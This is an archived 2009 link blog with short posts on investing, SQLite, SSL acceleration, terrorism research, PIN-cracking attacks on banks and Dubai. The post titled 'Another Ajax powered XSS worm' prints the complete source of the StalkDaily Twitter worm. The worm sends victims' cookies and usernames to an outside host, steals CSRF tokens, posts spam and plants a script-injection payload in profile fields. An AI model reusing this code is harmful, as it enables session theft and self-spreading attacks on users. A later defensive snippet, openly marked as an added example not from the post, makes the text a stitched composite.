I am a hacker and you are afraid and that makes you more dangerous than I ever could be.
Reid Hoffman: My Rule of Three for Investing

Topic: Miscellaneous
11:20 am EDT, Apr 20, 2009
1. How will you reach a massive audience? In real estate the wisdom says “location, location, location.” In consumer Internet, think “distribution, distribution, distribution.” Thousands of products launch every month on hundreds of thousands of new Web pages. How does a company rise above the noise to attract massive discovery and adoption? YouTube did it through existing channels like MySpace, which already reached millions. Yelp had strong SEO, which found them a mass audience searching for restaurants and nightlife. Facebook’s University-centric approach landed them 80% adoption across a campus within 60 days of launch. Every Net entrepreneur should answer these questions: How do we get to one million users? Then how do we get to 10 million users? Then how will you get deep engagement by your users.
Writing a .NET Wrapper for SQLite

Topic: Miscellaneous
12:30 pm EDT, Apr 18, 2009
A couple of weeks ago we posted a tutorial on using SQLite in PHP. I thought I'd expand on that tutorial and demonstrate how to work with SQLite using C# and .NET. In this tutorial, we're going to build a simple wrapper class around the SQLite C/C++ interface.
o3 magazine | Open Source SSL Acceleration

Topic: Miscellaneous
11:22 am EDT, Apr 16, 2009
SSL acceleration is a technique that off-loads the processor-intensive public key encryption algorithms used in SSL transactions to a hardware accelerator. These solutions often involve a considerable up-front investment, as the specialized equipment is rather costly. This article, though, looks at using off-the-shelf server hardware and open source software to build a cost-effective SSL accelerator.
Knowing the Enemy | George Packer in The New Yorker

Topic: Current Events
6:33 pm EDT, Apr 15, 2009
I somehow missed this fantastic "Al'Queda is a scene" roundup from NoteWorthy. George Packer is simply essential. This is a long post because there is no way to boil this down. "After 9/11, when a lot of people were saying, ‘The problem is Islam,’ I was thinking, It’s something deeper than that. It's about human social networks and the way that they operate."
That's David Kilcullen, an Australian lieutenant colonel who may just be our last best hope in the long war. "The Islamic bit is secondary. This is human behavior in an Islamic setting. This is not ‘Islamic behavior.’" “People don’t get pushed into rebellion by their ideology. They get pulled in by their social networks."
In the 1 December issue of Jane's Intelligence Review, John Horgan writes (sub req'd): People who leave terrorist groups or move away from violent roles do so for a multitude of reasons. Horgan explains why greater understanding of the motivations behind this so-called 'disengagement' will help in developing successful anti-terrorism initiatives. The reality is that actual attacks represent only the tip of an iceberg of activity.
Here's the abstract of a recent RAND working paper: In the battle of ideas that has come to characterize the struggle against jihadist terrorism, a sometimes neglected dimension is the personal motivations of those drawn into the movement. This paper reports the results of a workshop held in September 2005 and sponsored by RAND’s Center for Middle East Public Policy and the Initiative for Middle East Youth. Workshop participants discussed the issue of why young people enter into jihadist groups and what might be done to prevent it or to disengage members of such groups once they have joined.
Now, back to the Packer piece: The odd inclusion of environmentalist rhetoric, he said, made clear that “this wasn’t a list of genuine grievances. This was an Al Qaeda information strategy." ... “bin Laden’s message was clearly designed to assist the President’s reëlection.” Bin Laden shrewdly created an implicit association between Al Qaeda and the Democratic Party, for he had come to feel that Bush’s strategy in the war on terror was sustaining his own global importance.
You may recall the speculation that Bush would produce bin Laden's he...
Verizon: Cracking PINs for Fun and Profit

Topic: Miscellaneous
2:36 pm EDT, Apr 15, 2009
"We're seeing entirely new attacks that a year ago were thought to be only academically possible," says Sartin. Verizon Business released a report Wednesday that examines trends in security breaches. "What we see now is people going right to the source ... and stealing the encrypted PIN blocks and using complex ways to un-encrypt the PIN blocks." Information about the theft of encrypted PINs first surfaced in an indictment last year against 11 alleged hackers accused of stealing some 40 million debit and credit card details from TJ Maxx and other U.S. retail networks. The affidavit, which accused Albert "Cumbajohnny" Gonzalez of leading the carding ring, indicated that the thieves had stolen "PIN blocks associated with millions of debit cards" and obtained "technical assistance from criminal associates in decrypting encrypted PIN numbers." But until now, no one had confirmed that thieves were actively cracking PIN encryption.
... shit. Information about how to conduct attacks on encrypted PINs isn't new and has been surfacing in academic research for several years. In the first paper, in 2003, a researcher at Cambridge University published information about attacks that, with the help of an insider, would yield PINs from an issuer bank's system.
.... Cambridge? I only know of one group in Cambridge that does this... When you Google "2003 Cambridge University pin" and get a result on Cryptome, you know it's gonna be good. I was not disappointed: Decimalisation table attacks for PIN cracking: We present an attack on hardware security modules used by retail banks for the secure storage and verification of customer PINs in ATM (cash machine) infrastructures. By using adaptive decimalisation tables and guesses, the maximum amount of information is learnt about the true PIN upon each guess. It takes an average of 15 guesses to determine a four digit PIN using this technique, instead of the 5000 guesses intended. In a single 30 minute lunch-break, an attacker can thus discover approximately 7000 PINs rather than 24 with the brute force method. With a $300 withdrawal limit per card, the potential bounty is raised from $7200 to $2.1 million and a single motivated attacker could withdraw $30-50 thousand of this each day. This attack thus presents a serious threat to bank security.
As Decius and I have said for years, at the bottom of most good security tales you always end up with either Felten or Anderson. :-) The paper also helped me understand (remember?) the significance of the PIN Offset field on ABA track II. (It's funny/sad when you google something and come up with your own website. I'm getting old.)
Autotuning... but in real life

Topic: Miscellaneous
4:22 pm EDT, Apr 13, 2009
This is amazing. Office life would be much better if everyone spoke in autotune.
Another Ajax powered XSS worm

Topic: Miscellaneous
10:06 pm EDT, Apr 12, 2009
An XSS/Ajax worm hit Twitter. But it's cool, because Ajax doesn't help amplify XSS attacks, right? Oh, wait, maybe it does. ;-) Update: the worm's source:
// Minimal XMLHttpRequest wrapper used by the worm to POST from the victim's session.
function XHConn()
{
    var xmlhttp, bComplete = false;
    try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
    catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
    catch (e) { try { xmlhttp = new XMLHttpRequest(); }
    catch (e) { xmlhttp = false; }}}
    if (!xmlhttp) return null;
    this.connect = function(sURL, sMethod, sVars, fnDone)
    {
        if (!xmlhttp) return false;
        bComplete = false;
        sMethod = sMethod.toUpperCase();
        try {
            if (sMethod == "GET")
            {
                xmlhttp.open(sMethod, sURL+"?"+sVars, true);
                sVars = "";
            }
            else
            {
                xmlhttp.open(sMethod, sURL, true);
                xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
                xmlhttp.setRequestHeader("Content-Type",
                    "application/x-www-form-urlencoded");
            }
            xmlhttp.onreadystatechange = function(){
                if (xmlhttp.readyState == 4 && !bComplete)
                {
                    bComplete = true;
                    fnDone(xmlhttp);
                }};
            xmlhttp.send(sVars);
        }
        catch(z) { return false; }
        return true;
    };
    return this;
}

// Form-encoding helper (encodeURIComponent plus a few extra substitutions).
function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();
    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    };
    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';
    ret = encodeURIComponent(ret);
    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    }
    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    });
    return ret;
}

// Harvest the logged-in screen name from the page's meta tag, then leak the
// (non-HttpOnly) cookies and the name to a third-party host via an image request.
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];
var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");

// Propagation: read the CSRF token out of the page, post a status update, and
// store the payload in the profile URL field, which the site echoed unescaped.
function wait()
{
    var content = document.documentElement.innerHTML;
    authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
    var authtoken = authreg.exec(content);
    authtoken = authtoken[1];
    //alert(authtoken);
    var randomUpdate=new Array();
    randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
    randomUpdate[1]="Join www.StalkDaily.com everyone!";
    randomUpdate[2]="Woooo, www.StalkDaily.com :)";
    randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
    randomUpdate[4]="Wow...www.StalkDaily.com";
    randomUpdate[5]="@twitter www.StalkDaily.com";
    var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
    updateEncode = urlencode(genRand);
    var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
    var ajaxConn = new XHConn();
    ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
    var ajaxConn1 = new XHConn();
    ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}
setTimeout("wait()",3250);
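The worm above only works because the profile URL it stores is echoed raw into an href attribute. The following is an added example, not code from the post or from Twitter, contrasting that unsafe rendering with a validated and attribute-encoded version; all function names are hypothetical, and the only input reused is the payload string quoted in the worm source.

```javascript
// Added example (not from the page or from Twitter): unsafe vs. hardened
// rendering of a user-supplied profile link. All names are hypothetical.

// Payload quoted from the worm source above, used as a test input.
const WORM_URL = 'http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ';

// Unsafe: raw concatenation lets the embedded quote close the attribute
// and the rest of the string becomes live markup.
function renderProfileLinkUnsafe(url) {
  return '<a href="' + url + '">' + url + '</a>';
}

// Minimal HTML escaping for text and double-quoted attribute contexts.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Input validation for a user-supplied link: refuse markup, quote and
// whitespace characters outright, require a parseable URL, and allow only
// http(s). Returns the normalized href, or null when the value must be rejected.
function normalizeProfileUrl(input) {
  const s = String(input);
  if (/[<>"'\s]/.test(s)) return null;
  let u;
  try { u = new URL(s); } catch (e) { return null; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  return u.href;
}

// Hardened: validate first, then encode for the attribute and text contexts.
// Returns an empty string (no link) when the stored value is unacceptable.
function renderProfileLinkSafe(input) {
  const href = normalizeProfileUrl(input);
  if (href === null) return '';
  const e = escapeHtml(href);
  return '<a href="' + e + '" rel="nofollow">' + e + '</a>';
}

// Check used to compare the two renderings: did a script tag survive?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

Marking the session cookie HttpOnly would have blunted the `document.cookie` exfiltration in the same worm, but not the self-propagating posts, which ride the victim's live session and CSRF token; only fixing the injection point stops those.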
The dark side of Dubai

Topic: Society
1:48 pm EDT, Apr 11, 2009
Johann Hari: All over the city, there are maxed-out expats sleeping secretly in the sand-dunes or the airport or in their cars. "The thing you have to understand about Dubai is – nothing is what it seems," Karen says at last. "Nothing. This isn't a city, it's a con-job." The sheikh did not build this city. It was built by slaves. They are building it now.
I believe this is what you'd call an indictment. Jeff Jarvis: Dubai is either an act of fiction or of the future. I arrived thinking the former; I leave wondering whether it could be the latter.
From the archive, a selection: Dubai threatens to become an instant ruin, an emblematic hybrid of the worst of both the West and the Middle-East and a dangerous totem for those who would mistakenly interpret this as the de-facto product of a secular driven culture.
... it's clear that the emirate will soon be overflowing with attractions ...
Dubai, with its Disneyesque Arab souks in which you can purchase Arab handicrafts or a Cinnabon ...
The company behind some of Dubai's best-known landmarks is considering a stock market listing to raise as much as $15bn to reinforce its finances.
-- Read this now. Back to Johann Hari: The most famous hotel in Dubai – the proud icon of the city – is the Burj al Arab hotel, sitting on the shore, shaped like a giant glass sailing boat.